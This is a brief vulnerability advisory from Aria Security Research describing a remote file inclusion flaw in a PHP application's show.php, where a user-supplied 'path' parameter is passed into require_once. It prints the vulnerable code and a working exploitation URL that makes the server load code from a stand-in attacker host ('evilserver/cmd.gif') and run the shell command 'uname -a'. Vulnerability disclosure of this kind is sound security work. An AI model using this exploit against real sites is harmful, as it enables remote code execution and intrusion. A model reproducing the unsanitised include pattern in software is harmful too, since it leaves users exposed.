Disscution:
The bug reside in show.php
Vulnerable Code:
$CFG['SDIR'] = $path;
$CFG['CDIR'] = $CFG['SDIR']."./common";
require_once($CFG['CDIR']."/error.php");
require_once($CFG['CDIR']."/init.php");
Exploitation example:
http://[target].com/[path]/show.php?path=http://evilserver/cmd.gif?&cmd=uname -a
Contact the Vendor
===========================================================
Aria Security Research
Http://www.aria-security.net